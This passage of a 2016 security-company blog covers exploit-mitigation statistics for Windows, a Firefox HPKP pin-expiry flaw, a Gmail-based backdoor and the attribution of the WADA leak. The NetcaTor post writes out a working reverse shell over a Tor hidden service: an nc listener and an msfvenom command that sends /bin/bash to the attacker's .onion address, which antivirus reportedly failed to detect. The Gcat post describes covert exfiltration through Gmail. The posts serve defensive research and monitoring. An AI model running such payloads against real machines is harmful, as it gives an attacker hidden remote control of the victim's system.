One of the fundamental threats in security are vulnerabilities in general and, in particular, being able to exploit them to execute code. Historically, dozens of technologies have been developed to mitigate exploits in Windows, creating barriers for stopping a vulnerability ending up in a code execution. Many of this countermeasures or barriers need the "to-be-protected binary" to be compiled with a particular option enabled for the protection to be real. P ESTO PE(files) Statistical Tool has been created to be able to analyze how and how many files are protected in the operative system. PESTO sample of execution Description This is a Python script (that needs to import pefile library) that extracts and saves in a database some PE file security characteristics or flags, searching for every PE binary in a whole directory, and saving results into a database. It checks for architecture flag in the header, and for the following security flags: ASLR, NO_SEH, DEP and CFG. It searches for every PE binary in a whole directory, and saves results into a database. Code is clear enough to modify flags and formats to your own needs. More details and flag explanation in here: https://www.slideshare.net/elevenpaths/anlisis-del-nivel-proteccin-antiexploit-en-windows-10 Functionality The script just needs a path and a tag. The program will go through the path and subdirectories searching for .DLL and .EXE files and extracting the flags in the PE header (thanks to pefile python library). The program requires a tag that will be used as a suffix for logs and database filenames, so different analysis can be done in the same directory. The information provided by the script is: Percentage of .DLL and .EXE files with i386, AMD64 or other architecture. Percentage of ASLR, NO_SEH, DEP and CFG flags enabled or disabled in the headers. After finishing the analysis it will prompt to export results in a SQL or CSV format. It will create as well a .db file which is a sqlite file with the information collected. PESTO is available from our GitHub. Hope you find it useful.
10 de octubre de 2016
La curiosa historia de la vulnerabilidad "cíclica y programada" en HPKP de Firefox
Probablemente esta sea una de las historias más curiosas sobre cómo se ha descubierto un fallo de seguridad, además de un fallo de seguridad en sí mismo de lo más rocambolesco. De cómo se descubrió un problema de ejecución de código en Tor Broswer, que en realidad acabó además en un grave agujero de implementación de HPKP en Firefox tras un proceso complejo que ha desconcertado a muchos especialistas intentando aclarar la situación. Ha pasado desapercibida para los medios, pero merece la pena analizarla. El "no fallo" en Tor Browser Movrcx descubrió un fallo muy peculiar a principios de septiembre. Defendía que había encontrado una fórmula en el que podía ejecutar código en cualquier usuario de Tor Broswer (basado en Mozilla Firefox ESR, la Extended Support Release). Y no por un fallo explotable en el navegador, sino por el propio funcionamiento del ecosistema de Tor. Lo "único" que necesitaba el atacante era disponer de un certificado TLS válido del dominio "addons.mozilla.org". Esto mitiga mucho el alcance de la vulnerabilidad, y pocos se lo tomaron en serio. Pero aunque parezca complicado, lo cierto es que ese certificado ya fue comprometido en su día por iraníes... Y aun así, si lo que se quiere es espiar qué se hace en la red Tor, definitivamente es algo al alcance de un gobierno. Además, Movrcx no argumentaba el fallo en sí como el problema mayor, sino el hecho de que un simple certificado fuese el requisito más complejo para poder potencialmente ejecutar código en cualquier usuario del navegador Tor. Si el atacante podía controlar la url de actualización haciéndole pensar que era addons.mozilla.org, podría redirigir a la víctima a cualquier web para actualizar El fallo consistía en una cadena de errores, como todo buen problema de seguridad con raíces en los procedimientos y no tanto en el código. Se basaba en que el sistema de actualización de plugins de Mozilla (y de Tor Browser), permitía autofirmar extensiones. Además, Tor Browser pregunta cada 24 horas por una actualización de extensiones de forma automática. Si en un nodo de salida (controlado por el atacante) se consigue redirigir a la víctima a una página que parece ser la de "versioncheck.addons.mozilla.org" (falseada gracias al certificado) y que durante la actualización se descargue una extensión que no es el verdadero NoScript (por poner un ejemplo de plugin que viene de serie con Tor Broswer), este sería validado e instalado de forma totalmente transparente para el usuario. Puede parecer un poco rebuscado porque precisamente para evitar esto están los certificados. El descubrimiento fue criticado no solo por eso, sino porque según los más avispados, no solo necesitaba el certificado para consumar el ataque, sino también romper el pinning del navegador, que es precisamente para lo que sirve (y con lo que demuestra su utilidad). El ataque parecía una farsa, irrealizable. Pero Movrcx no mentía, a él le había funcionado incluso con el pinning activo… y podía demostrarlo. ¿Había otro error en la implementación de pinning? No parecía, porque lo curioso es que avanzado septiembre, en fechas diferentes, el ataque ya no funcionaba a quien intentaba reproducirlo. El pinning lo protegía. ¿Qué demonios estaba pasando? Esto ha mantenido a una serie de expertos indagando durante días. Veamos qué pasaba. El "sí fallo" en el "no uso" de HPKP Muchos vieron un fallo fundamental en la conceptualización del ataque: le funcionaba porque en su entorno obviamente no falsificó un certificado real sino que en el laboratorio había usado una CA introducida a mano como raíz en Tor Browser, y por defecto, Mozilla no pinea certificados metidos por el propio usuario. En la vida real, no hubiera funcionado. Esta función se llama security.cert_pinning.enforcement_level en about:config, que está establecido a 1 en Firefox, o sea, no pinear certificados autointroducidos por el usuario. Pero ya nos estábamos equivocando. Tor Browser es Firefox fortificado, y en Tor, security.cert_pinning.enforcement_level está por defecto a 2... pinear siempre. El ataque no tenía que haberle funcionado ni en real ni en laboratorio. ¿Qué pasaba? Compilaron Tor Broswer para ver si tenía algún error al detectar CA propias o ajenas, muchos expertos comenzaron a lanzar teorías… O bien creían la versión de Movrcx o bien no le daban la mayor importancia al ataque. Pero algo no cuadraba… y algunos se quedaron investigando. Finalmente, se desveló un dato curioso: este fallo podía ser cíclico y funcionar durante ventanas de tiempo cambiantes y cada cierto tiempo. Por ejemplo, el ataque sería posible durante algunos días de noviembre en el futuro, o durante 35 días desde diciembre a enero de 2017. Como decía Ryan Duff.. una vulnerabilidad "programada" ya de por sí tiene interés. La raíz del problema Lo que pasaba es que addons.mozilla.org. no utiliza HPKP para pinear su certificado. Usa algo mucho más estático: en cada nueva publicación de Firefox, incrusta el pin en el código con fecha de caducidad. Esto tiene sentido porque así no tiene que recogerlos la primera vez del servidor (están "preloaded"), y esto nos alivia el problema de que esa primera vez que se recogen los pines, exista un hombre en el medio. Los pines, tanto de HPKP como incrustados, tienen que caducar. Si no, se corre el riesgo de que sean comprometidos, deban ser reemplazados, y el navegador que los recuerda nunca los olvide. Ante el miedo a que un usuario no pueda acceder a una página porque por una emergencia el servidor ha cambiado el certificado y el navegador recuerda otro, s e utilizan periodos de caducidad relativamente cortos. Si algo pasa, al menos la ventana de tiempo del problema se minimiza. También se corre el riesgo de que un usuario que no actualiza su Firefox (entre otros problemas de seguridad que asume al no hacerlo), pierda acceso al final hacia el sitio donde quiera ir porque nunca renovaría su certificado. En resumen, un pin caducado, deja de tener efecto. Así que es buena idea que caduquen pero… ¿cuándo es lo ideal? ¿cuándo deben caducar los pines incrustados de una página esencial de Firefox y controlada por ellos mismos? Muy sencillo: al menos hasta que aparezca la siguiente versión de Firefox con una nueva fecha. De lo contrario, el pinning no tendrá efecto desde la fecha de caducidad hasta que el navegador sea actualizado. Y aquí es donde justa y sorprendentemente fallaron todos los controles de Mozilla. Por ejemplo (y son datos reales), Firefox ESR 45.3.0 salió el 2 de agosto con la caducidad de los pines incrustada para el 3 de septiembre. Firefox ESR 45.4.0 no salió hasta el 20 de septiembre… así que del 3 de al 20 de septiembre, para todo usuario de Firefox ESR 45.3 y 45.4 (y Tor Browser) incluso actualizando el mismo día, los pines no eran efectivos. Justo en el periodo en el que Movrcx realizó sus pruebas. Simplemente no se hacía certificate pinning. Tor Browser sigue los pasos de las releases ESR de Mozilla y por tanto… Movrcx tenía razón, y sus escépticos detractores que hicieron pruebas más tarde… también. Conclusiones Mozilla ha reaccionado rápido y bien. Una de las contramedidas ha sido no depender solo de pines estáticos, sino introducir HPKP para que el pineo sea también dinámico. Gracias a la extensión de Firefox PinPatrol podemos comprobarlo, además de ver en claro cuándo expiran los pines, por si existiera algún otro problema… (Mozilla sigue sin dar una interfaz a este tipo de datos almacenados en el navegador). Mozilla ha añadido pines HPKP a muchos de sus dominios y subdominios, aunque estuvieran también incrustados en el navegador Ivan Ristic planteaba curiosamente a principios de septiembre una pregunta: "¿ Está HPKP muerto?". Su argumentación es impecable, pero no creo que sea la conclusión adecuada. HPKP es útil, necesario y realiza su cometido. La mayor parte del problema, decía curiosamente, está en que los administradores no conocen qué políticas aplicar para desplegarlo. También en cómo lo implemente cada cliente (sobre esto presentaremos una investigación de ElevenPaths sobre HPKP y HSTS en la Cryptology and Network Security Conference 2016 en Milán en noviembre.). Con este fallo se demuestra que HPKP está vivo (ha resuelto un problema y prevenido un ataque) pero que como suele ocurrir, efectivamente es necesario entender el protocolo o de lo contrario, no servirá de nada. Pero esto ocurre con HPKP y cualquier otra medida de seguridad que se nos ocurra. Sergio de los Santos ssantos@11paths.com @ssantosv
3 de octubre de 2016
Participating in GSMA Mobile 360 LATIN AMERICA
Mobile 360 - Latin America brings market leaders from Central and South America across the mobile telecom ecosystem for a two-day thought leadership conference together with operator-led Working Groups on day three. Attendees will learn and discuss key drivers in innovation in the region centered around IoT, Connected Car, Mobile Identity, Mobile Money, NFV, 5G, Media & Advertising, and more. In addition, an Innovation Showcase panel will allow start-ups to hear from venture capitalists, investors, and industry experts followed by a pitch session for the start-ups. Session: Mobile Identity There is no denying that mobile technology is deeply embedded into our lives. More and more industries are incorporating mobile into their business models and leveraging digital communications. While this improves efficiencies and can create competitive advantages, it also adds additional challenges to organisations to protect both themselves and their customers. If this aspect of the business is ignored or done poorly, the results can be catastrophic to the organisation. Much focus has been placed on server integrity, internet security, cloud protection and safe data exchange in the traditional business models. What is new and must be explored is the data flow through the mobile ecosystem, specifically mobile security and data privacy. M2M and IoT will continue to grow and new security threats will emerge. How is this data being shared across the value chain? How can organisations ensure their data is safe as it travels through the network? How should companies respond to security breaches? What are the new rules with regard to privacy? How should enterprises be protected in this increasingly connected world? Óscar Mancebo, Head of Mobile Connect at Telefónica An increasing number of digital services, including financial and government services, are offering customers access using digital authentication and identity. Despite the complexity involved in deployment, digital authentication enables users to have a better quality of experience by giving them greater control over their own digital identities, and also enables more effective customer data management by service providers. A range of service providers are offering digital authentication and identity services today, from mobile operators to specialist companies, often utilising different technology approaches. Telefónica has played a relevant role in this session, describing how Mobile Connect is well positioned as an alternative to the password based model and explaining how this product is fully aligned with the new strategic plan announced some weeks ago by the Company: We choose it all. For more information on Mobile Connect and to see it in action go to: www.elevenpaths.com Mobile Connect website: https://mobileconnect.io/
30 de septiembre de 2016
Aplicación práctica sobre NetcaTor, una shell inversa a través de Tor
Uno de los puntos débiles de los atacantes a la hora de exfiltrar información comprometida es la exposición de parte de su infraestructura tecnológica durante el proceso. En este sentido, la red Tor ofrece la posibilidad de hacer accesibles servicios en una máquina como servicios ocultos o hidden services aprovechando la capa de anonimato que ofrece y así evitar que quede expuesta la localización real de la máquina. Cómo configuramos un hidden service La configuración de un hidden service es sencilla y además está bien documentada por parte de los desarrolladores del proyecto Tor dentro del propio código como en la propia web del proyecto. Virtualmente, cualquier servicio que utilice tráfico TCP puede ser creado a través de la red Tor modificando la configuración del archivo torrc. La creación del hidden service con Tor instalado en una máquina requiere la edición del fichero de configuración de Tor torrc que se encuentra en la ruta /etc/tor/ en sistemas operativos Linux. En las líneas del fichero 63 y siguientes se detallan ejemplos de cómo configurar un hidden service. La primera de ellas establecerá la ruta en la que se almacenará la información relativa al hidden service y que será creada si no existe por el servicio que arranca Tor. En esa ruta se almacenan dos archivos importantes: hostname, que contiene el dominio que otros podrán utilizar para acceder al servicio y private_key, el fichero que almacena la clave privada del hidden service y cuya custodia queda a cargo del administrador del sitio siendo necesario que permanezca secreta. ############### This section is just for location-hidden services ### ## Once you have condivd a hidden service, you can look at the ## contents of the file ".../hidden_service/hostname" for the address ## to tell people. ## ## HiddenServicePort x y:z says to redirect requests on port x to the ## address y:z. #HiddenServiceDir /var/lib/tor/hidden_service/ #HiddenServicePort 80 127.0.0.1:80 Por ejemplo, en el caso de que hubiéramos desplegado un servidor Apache en el puerto 80, podríamos hacerlo accesible a través de un hidden service editando la configuración y descomentando la información de las líneas 72 y 73 de dicho fichero para crear los archivos hostname en la ruta /var/lib/tor/hidden_service/ y redirigir el tráfico que reciba Tor en el puerto 80 a ese hidden service al puerto 80 de la máquina local en donde está esperando el servidor Apache. Esta aproximación podría llevarse a cabo también para exponer un servicio SSH accesible a través de Tor, modificando las líneas relativas al HiddenServicePort para que apunten al puerto 22. Para acceder a dicho servicio existen diferentes aproximaciones, pero la más sencilla es la de lanzar el comando de conexión precediéndolo del comando torify, que se encargará de redirigir el tráfico de red para enviarlo a través de la instancia de Tor que esté en ejecución en dicha máquina. La prueba de concepto Desde el punto de vista de la arquitectura necesaria para esta prueba de concepto se asumirá qué víctima y atacante están utilizando sistemas Linux y tienen Tor instalado y corriendo como servicio. El procedimiento seguido para llevar a cabo esta prueba de concepto es el siguiente: 1. Despliegue del servicio malicioso a la escucha en la máquina atacante. En este caso se desplegará un netcat a la espera de conexiones en el puerto 1234 de la máquina local. No es necesario exponer públicamente el servicio ya que el tráfico en ese puerto será encaminado hacia y desde Tor. Attacker > nc -v -l -p 1234 127.0.0.1 2. Configuración de Tor en la máquina atacante para hacerlo accesible a través de un dominio .onion. Utilizando como plantilla el fichero torrc, se añaden dos líneas nuevas que especifican la ruta en la que se generarán los ficheros auxiliares del servicio y las reglas de direccionamiento. HiddenServiceDir /var/lib/tor/nc_hidden_service/ HiddenServicePort 1234 127.0.0.1:1234 El dominio .onion definido en el archivo hostname estará disponible apenas unos segundos después de arrancarlo. En el caso de esta prueba de concepto el dominio generado es: vks3v4ilo4tgud7h.onion. Attacker > service tor restart Figura 1. Esquema del sistema malicioso que utiliza Tor para la exfiltración de información. 3. Preparación del payload torificado por parte del atacante. El payload se generará con la utilidad msfvenom de Metasploit Framework utilizando el módulo linux/x86/exec que torificará la conexión de netcat hacia el dominio .onion del atacante y que permitirá al atacante la ejecución de comandos. Attacker > msfvenom -p linux/x86/exec CMD="torify nc vks3v4ilo4tgud7h.onion 1234 -e /bin/bash" -f elf R > poc 4. Ejecución del payload torificado en la máquina de la víctima. Aunque se podría realizar explotando algún tipo de vulnerabilidad, para simplificar el proceso en este caso se ha ejecutado directamente el payload generado. Victim > chmod +x poc Victim > ./poc 5. Explotación por parte del atacante de la shell redirigida hacia netcat. En este caso, se asume que la víctima cuenta con Tor instalado y la aplicación torify disponible. En el supuesto de no ser así, se podría instalar automáticamente desde los repositorios oficiales de la distribución si el usuario dispone de los permisos adecuados y así proceder a su instalación. En cualquier caso, si el usuario no tiene permisos de administración se podría incluir también el proceso de descarga de la última instancia de Tor y compilarla desde las fuentes satisfaciendo las dependencias o accediendo a versiones precompiladas de la aplicación. El primer análisis del payload generado en esta prueba de concepto en Virustotal no ha sido clasificado como malicioso por ninguna de las 53 soluciones de antivirus. Figura 2. Ejemplo de la ejecución de la prueba de concepto en una máquina local. Hemos creado entonces un payload utilizando el módulo exec con msfvenom. El inconveniente que tiene es que tenemos que recordar el comando completo que tenemos que ejecutar. Una aproximación más cómoda sería crear a partir de ese módulo uno nuevo que directamente nos solicitara el dominio .onion y el puerto al que nos vamos a conectar. En el siguiente repositorio de Github podréis acceder al nuevo módulo que hemos creado. Esta prueba de concepto pone sobre la mesa la necesidad de monitorizar si máquinas consideradas como críticas están usando Tor para comunicarse con la red y determinar si este comportamiento es esperado o si podría ser consecuencia de un potencial encubrimiento de comunicaciones maliciosas.
28 de septiembre de 2016
Una investigación de ElevenPaths en la RSA Conference de Abu Dhabi 2016
Una investigación promovida desde el área de innovación y laboratorio de ElevenPaths, ha sido aceptada para participar en la RSA Conference de Abu Dhabi 2016 que tendrá lugar en noviembre y donde se presentarán los resultados. Las conferencias RSA (cuyo mayor exponente se celebra en Estados Unidos) es reconocida mundialmente como el evento más importante para unir a investigadores de la industria de la seguridad a todos los niveles. Se ha convertido en el referente mundial para que se compartan ideas sobre seguridad, se desvelen los últimos productos de las compañías, y se impartan charlas, talleres, conferencias, etc. Tiene una afluencia de público cercana a los 50.000 visitantes al año. La publicación "Android Malware Pattern Recognition for Fraud and Attribution" será presentada por Nikolaos Tsouroulas, ElevenPaths Head of Cybersecurity; y Ahmed Alketbi, Senior Manager, Etisalat Security Solutions Marketing. Además, la investigación será publicada en "Encyclopedia on Social network analysis and mining (ESNAM)" editada por Springer. La investigación habla de las técnicas de reconocimiento de patrones de malware y su problemática ante las nuevas amenazas. Aunque los métodos de Big Data y machine learning permiten aliviar el trabajo más duro para combatir el problema, los atacantes saben cómo eludir los controles de seguridad. Si se estrecha el alcance del Big Data hasta el punto en el que la HUMINT puede abordarlo, se estará aprovechando ambas técnicas y mejorándolas. Fruto de esta investigación y difusión se espera no solo entender y mejorar la ciberseguridad en general sino integrar este conocimiento generado para potenciar e innovar en los productos y servicios más representativos desarrollados por ElevenPaths.
26 de septiembre de 2016
Gcat, un backdoor que utiliza Gmail como C&C
Las muestras de malware, que utilizan servicios de correo electrónico como canales encubiertos para la exfiltración de información, están resultando eficaces en entornos corporativos con gran cantidad de información, principalmente por lo que implica limitar las comunicaciones hacia proveedores que también son usados legítimamente. En un informe publicado por ElevenPaths el pasado mes de junio identificamos un incremento de hasta un centenar de muestras de malware entre junio de 2015 hasta julio de 2016, relacionadas con el uso de técnicas de covert channel que abusaban del correo de Gmail para exfiltrar información. Sin embargo, cuarenta de estas muestras estarían basadas en una herramienta denominadas Gcat. Análisis de un binario basado en Gcat La herramienta Gcat consta de dos ficheros: gcat.py e implant.py. El fichero gcat.py es el componente que ejecuta el atacante y que permitirá realizar acciones sobre el implant.py desplegado en las víctimas previa conversión a binario ejecutable. La configuración que debe realizarse en Gcat implica la modificación de estos dos ficheros: gcat.py e implant.py. En este sentido, se debe añadir en ambos ficheros una cuenta de correo de Gmail y su contraseña. Por otro lado, es necesario activar la opción de permitir aplicaciones menos seguras en la parte de seguridad de la cuenta Gmail y habilitar IMAP en los ajustes de esta. En los detalles de instalación y configuración de la herramienta se indica que es necesario realizar la compilación en 32 bits. Adicionalmente, durante el análisis de diferentes muestras, se han encontrado modificaciones tanto del archivo implant.py como del binario generado a partir de este. El objetivo de estas modificaciones es dificultar la detección y el análisis del fichero malicioso. Algunas de estas modificaciones incluyen técnicas para reubicar porciones de código y protegerlos con código antidesensamblado. También se han encontrado tareas de reenrutamiento de todas las llamadas a funciones a través de una función central para evadir el análisis estático de flujo de ejecución del programa. Una vez desplegado el implant.py en la víctima, desde el controlador gcat.py, podremos listar los implantes desplegados en las víctimas con la opción -list. Por cada víctima se muestra una cadena que identifica de forma exclusiva el sistema infectado, además del sistema operativo en el que se está ejecutando como se muestra en la Figura 1. En las siguientes figuras podemos observar los correos generados en la cuenta de Gmail además del contenido de cada uno de ellos con información sobre el contexto de ejecución en formato Json además de los procesos ejecutados y sistemas infectados: En cuanto al implant.py, tras haber sido transformado a binario y obtener la ruta de la carpeta temporal del sistema, obtiene su propio ID de proceso para utilizar posteriormente en la creación de una carpeta temporal del sistema con el nombre _MEI seguido del ID del proceso obtenido. El binario malicioso escribe 17 ficheros en la carpeta _MEI, necesarios para su funcionamiento en un entorno Windows como fichero binario PE, así como las diferentes librerías que utiliza (Figura 4). Seguidamente, se genera un nuevo proceso con la función CreateProcessW con el mismo nombre pero con un tamaño superior que sirve para establecer la comunicación con el servicio de Gmail. Al realizarse la comunicación mediante el protocolo HTTPS no es posible ver el contenido de la misma. Al abrirse un nuevo proceso fuera del contexto del debugger, se ejecuta una nueva instancia del debugger para realizar el análisis del proceso denominado attach en la herramienta utilizada. En este momento, se realiza una conversión de hexadecimal a decimal del PID del nuevo proceso para saber cuál de los dos procesos con el mismo nombre se debe realizar el attach. En este momento del análisis, se analiza el nuevo proceso en memoria con el objetivo de obtener el usuario de Gmail y la contraseña utilizada por el atacante. También es posible hacer un dump de la memoria del nuevo proceso generado para obtener los parámetros Gmail_user y Gmail_pwd. Precaución a la hora de considerar los dominios de Gmail como confiables Como ya hemos visto, los dominios de Gmail u otros proveedores de correo electrónico o incluso dominios relacionados con redes sociales podrían estar siendo utilizados para tomar el control de los sistemas de una organización. Es por ello que ElevenPaths recomienda realizar una monitorización en detalle de los mismos o incluso bloquearlos en el caso de sistemas que alberguen información sensible. Por otro lado, con las tecnologías de defensa contra malware avanzado se realiza una monitorización exhaustiva del comportamiento del endpoint, por lo que esta aproximación permitiría analizar el comportamiento del mismo si un dominio o servicio, a priori legítimo, podría estar siendo utilizado con fines maliciosos.
23 de septiembre de 2016
![[Nuevo informe] En un Windows 10 básico, el 22,2% de las librerías no aplica alguna medida de seguridad anti-exploit](https://media.telefonicatech.com/telefonicatech/uploads/2021/1/6017_flag4.png)
[Nuevo informe] En un Windows 10 básico, el 22,2% de las librerías no aplica alguna medida de seguridad anti-exploit
A finales de 2013 se descubrió un 0day en Internet Explorer (CVE-2013-3893). Se trata de una vulnerabilidad encontrada mientras estaba siendo aprovechada por atacantes desde no se sabe cuándo.. Sin entrar en detalles, lo que más llamaba la atención es cómo habían conseguido crear el exploit. Dos de los enemigos de los creadores de exploits son habitualmente DEP en menor medida y ASLR en gran parte. ¿Cómo habían eludido este último sistema de seguridad? Simple: una DLL de sistema no tenía activado ASLR. No había razón alguna para que no lo hubiesen activado en esa en particular, quizás fue solo un despiste, pero que permitió a los atacantes aprovechar de forma sencilla una grave vulnerabilidad. ¿Qué otros binarios de sistema no han activado esta y otras protecciones en Windows 10? Este informe, elaborado por el área de innovación y laboratorio de ElevenPaths, desvela cuántos binarios no implementan las medidas básicas de seguridad en los ejecutables más comunes que cualquier usuario puede tener en Windows 10. Cuatro medidas de seguridad Cada nuevo sistema operativo que se lanza al mercado es más seguro que el anterior porque aplica más y mejores técnicas de mitigación o protección en seguridad. Al menos eso se dice en las campañas publicitarias y notas de prensa en las que los lanzan. Se incluyen métodos revolucionarios que prometen grandes mejoras y acabar con los problemas de seguridad existentes. Sin embargo, los problemas siguen ahí. Se transforman, se intercambian, se potencian unos y olvidan otros… pero nunca desaparecen. En este estudio hemos analizado las medidas de seguridad más recientes y clásicas, relativas a la compilación de binarios en Windows que implementa Windows 10. Pretendemos responder a algunas preguntas: ¿Utiliza sus propias fórmulas más modernas? ¿Aplica las medidas más clásicas a todos sus binarios? ¿En qué porcentaje? ¿Y otros fabricantes, aplican estas técnicas? Veremos en este informe estudiaremos qué medidas de seguridad pueden tener activadas los ejecutables en Windows 10, y cuáles tienen activadas en realidad. En el informe se han comprobado cuatro medidas de seguridad básicas: DEP, ASLR, SEH y CFG. Son cuatro métodos anti-exploit que, de encontrarse activos en un fichero ejecutable (exe o dll) dificultan a un potencial atacante la capacidad de aprovechar vulnerabilidades de ejecución de código. El experimento Los ficheros objetivo del estudio han sido los ejecutables (EXE) y librerías (DLL). Se han analizado todos los ejecutables en tres perfiles de instalación (Windows 10, Windows 10 con paquete ofimático, y Windows 10 con paquete ofimático y navegadores y lectores PDF). Hemos almacenado sus características, o lo que es lo mismo qué flags de los mencionados más arriba se encuentran activos en los ejecutables y librerías. Hemos analizado el siguiente número de ficheros por cada perfil: Base: 18489 archivos DLL y 2597 archivos EXE. Ofimática: 20735 archivos DLL y 2716 archivos EXE. Completa. 20856 archivos DLL y 2774 archivos EXE. En general, en un Windows 10 básico con Office, navegadores y lectores PDF, un 22,20% de los ficheros binarios no activan alguna de las medidas de seguridad estudiadas. El porcentaje de ficheros protegidos según cada perfil aumenta en tanto en cuanto la medida de seguridad se encuentra más asentada y arraigada, dejando a CFG (más reciente) en el último lugar con entre un 80 y un 90% de adopción en los diferentes perfiles. NO_SEH, aunque también antigua, no es tan adoptada. Es posible que se deba a la circunstancia de cada fichero, que daría cabida a otras medidas complementarias y que cubrieran con otras fórmulas la necesidad de protección que ofrece NO_SEH. Con respecto a los navegadores (y programas de terceros en general) parece que Chrome ya ha adoptado en buena medida las nuevas mitigaciones anti-exploit como CFG y tiene al 100% asimiladas el resto. El único fichero de Chrome que no tiene activado ASLR es el propio instalador. Firefox, olvida CFG y NO_SEH. Entre los lectores de PDF más populares, Adobe (históricamente un desastre en seguridad) funciona en este sentido mejor que Foxit. El 100% de sus binarios tiene activado DEP y ASLR, aunque ambos ignoran la nueva medida de seguridad CFG. En general, la tecnología de mitigación más reciente, CFG, es la más olvidada tanto por la propia Microsoft (un 90% de sus ficheros en la instalación base no lo implementan) como por los programas más habituales (solo Chrome lo tiene en cuenta en un 81% de sus ficheros, el resto lo ignoran). Sin embargo, otras tecnologías de mitigación más antiguas son mucho más populares, como ASLR y DEP se encuentra casi universalmente adoptada tanto por programas como por sistema operativo. A medida que se introducen programas fuera de la instalación base, (ofimáticos, navegación o lectores PDF) el porcentaje de ficheros desprotegidos crece, sobre todo en CFG. Cabe recordar, como siempre, que la presencia o no de algunas de estos sistemas de mitigación (especialmente SEH) no merma necesariamente la seguridad del sistema operativo o los programas. Se pretende hacer énfasis con esto en que estas fórmulas son muy recomendadas, pero pueden encontrarse casos en los que otras mitigaciones adicionales o las circunstancias del binario (por ejemplo que no suela encontrarse en memoria, como el instalador) no las hagan necesarias… aunque por el contrario es altamente improbable que activarlas suponga un riesgo. En este sentido, el programa para mitigar la explotación (entre otras funciones) como EMET, de la propia Microsoft, ayuda a implementar de forma obligatoria e incluso reforzar muchas de las técnicas descritas junto con otras. Todos los detalles del informe, en los que se explican las tecnologías en detalle y se aportan más gráficas y comparativas, están disponibles en SlideShare. Análisis del nivel protección antiexploit en Windows 10 from ElevenPaths
21 de septiembre de 2016
Contradicciones en los ataques a la Agencia Mundial Antidopaje
El 13 de septiembre el grupo identificado como @FancyBears en Twitter publicaba, en una web de reciente creación, información sobre cuatro conocidas deportistas de élite que, presuntamente, habría sido sustraída en una acción perpetrada contra la WADA (World Anti Doping Agency). En un comunicado oficial la propia organización ha confirmado el ataque y la exposición de información de hasta 29 atletas, atribuyendo el ataque a orígenes rusos. Este incidente se produce apenas unas semanas después del envío de una serie de correos electrónicos de spear phishing para la recolección de credenciales de usuarios de WADA. Qué se sabe de la información expuesta La información publicada en las webs pertenecientes al colectivo incluía diversos ficheros PDF y capturas de pantalla de lo que parecían ser informes oficiales de WADA. En ellos se recoge información personal de los deportistas vinculada a los certificados de aprobación para uso terapéutico de determinados medicamentos. Los metadatos de los documentos extraídos exponen el nombre usuario chnd, el software OpenOffice 2.1 y la fecha del 31 de agosto de 2016 en una zona horaria UTC-4 salvo un fichero fechado el 8 de septiembre. Se ha podido identificar que este usuario chnd es el creador de otro documento disponible públicamente a través de un subdominio de WADA en el que se aloja el gestor documental ADAMS. Dicho documento publicado en noviembre de 2008 recoge los cambios que han tenido lugar en la versión 2.0 de la plataforma lo que apunta a que este usuario podría ser un usuario de administración dentro de la organización. En los metadatos, también se ha identificado la versión de OpenOffice 2.1, que se liberó en diciembre de 2006 y fue la versión más reciente utilizada hasta marzo de 2007. Actualmente se trata de una versión obsoleta de la suite de ofimática y se tiene constancia de la existencia de vulnerabilidades como CVE-2008-2152 que permiten la ejecución remota de código malicioso a partir de documentos ofimáticos especialmente diseñados. Con respecto a la web de difusión Las ciberidentidades implicadas utilizan una narrativa característica asociada tradicionalmente al colectivo hacktivista Anonymous que los propios autores enmarcan en el contexto de una operación a mayor escala bautizada como #OpOlympics. Tanto su iconografía como los mensajes publicados sitúan las acciones en la órbita de este colectivo. Por otro lado, se tiene constancia de que la marca Fancy Bear Hack Team ya ha sido asociada en febrero de 2016 a otros grupos hacktivistas vinculados a Rusia como APT28. En este sentido, la creación de la cuenta de Twitter @FancyBears data del 6 de septiembre de 2016 aunque su primer tweet no se publicó hasta las 23:08 del 12 de septiembre (UTC+2). En las páginas web se utiliza como fecha de la filtración el 13 de septiembre lo que podría indicar un desfase horario que situara al filtrador en la franja horaria de, al menos, UTC+3 (hora de Moscú). La segunda parte de la filtración tiene fecha de publicación en la web del 15 de septiembre. Sin embargo, las cabeceras consultadas hoy mismo sirven como fecha de última modificación el 14 de septiembre de 2016 a las 21:30 GMT. Es decir, el miércoles 14 de septiembre 23:30 de UTC+2 y ya 15 de septiembre para la zona horaria de UTC+3 y anteriores. Esta circunstancia es coherente con la hipótesis barajada por la WADA acerca de los orígenes del ataque. En la cuenta de Facebook facilitada por el colectivo también se publicita la información filtrada. Aunque el primer comentario está en griego, 6 de los 10 siguientes se encuentran en ruso, lo que también sugiere una primera divulgación de la página de Facebook en plataformas de habla rusa. La cuenta de correo facilitada como contacto es un correo electrónico de Yahoo que estaría vinculado a otro que utiliza el mismo alias en mail.ws. Por su parte la dirección de Bitcoin 1CPYPJkUwqCAdq5WhJKz765aa44JpQGxXN publicada en la página del grupo ha recibido al menos seis transacciones por valor de 0,04752135 bitcoins (25,71 euros al cambio). El dominio fancybear.org está registrado con un proveedor de registro anónimo mientras que en fancybear.net sí que se ha identificado información adicional que apuntaría a un usuario situado en Francia con una cuenta gmx.com. Ambos dominios fueron registrados recientemente: el 1 de septiembre de 2016. No se ha podido establecer la localización de los servidores porque la web utiliza la plataforma Cloudflare.com que ofrece un servicio de protección frente a ataques de denegación de servicio. Ninguno de los correos electrónicos identificados en la investigación ha sido utilizado para la contratación de este servicio lo que hace pensar en el uso de al menos otra cuenta de correo electrónico adicional por parte de los autores. Los comentarios del código HTML de la página en la que se expuso la primera parte de la fuga estaban en coreano, aunque se correspondían con palabras sencillas como: contenido (함유량), redes sociales (소셜) 네트워킹 ) o final (끝). Curiosamente, tras la divulgación de la segunda parte de la fuga, no se ha podido encontrar estos comentarios ni en el código de la página principal ni en las páginas page-1.html y page-2.html que se han creado tras esta segunda actualización. La estructura del nombre de estos archivos sugiere que en el futuro se vayan a producir más filtraciones. Por último, una de las imágenes de fancybear.net es 0_125b8b_3cb8177e_M.png con hash MD5 a20350dc2e412a9c351d83571ecc3251. La única referencia que se ha podido identificar en internet a una imagen con ese nombre se encuentra en el sitio de habla rusa kira-scrap.ru. Valoración Diversos medios de comunicación y la propia Agencia Mundial Antidopaje han manifestado que los presuntos responsables procederían de Rusia y estarían vinculados al grupo hacktivista Fancy Bear. Se han identificado evidencias que respaldan esta hipótesis como la publicación de los contenidos en una zona horaria de al menos UTC+3 y la referencia a una fotografía solamente encontrada en un dominio de origen ruso. Sin embargo, la información obtenida en esta investigación es en algunos momentos contradictoria, por lo que tampoco se puede descartar por completo que se trate de un ataque de falsa bandera en el que la información fuera intencionadamente expuesta para hacer creer que el ataque procede de Rusia. En tal supuesto, se desconocen los posibles actores así como sus motivos para llevar a 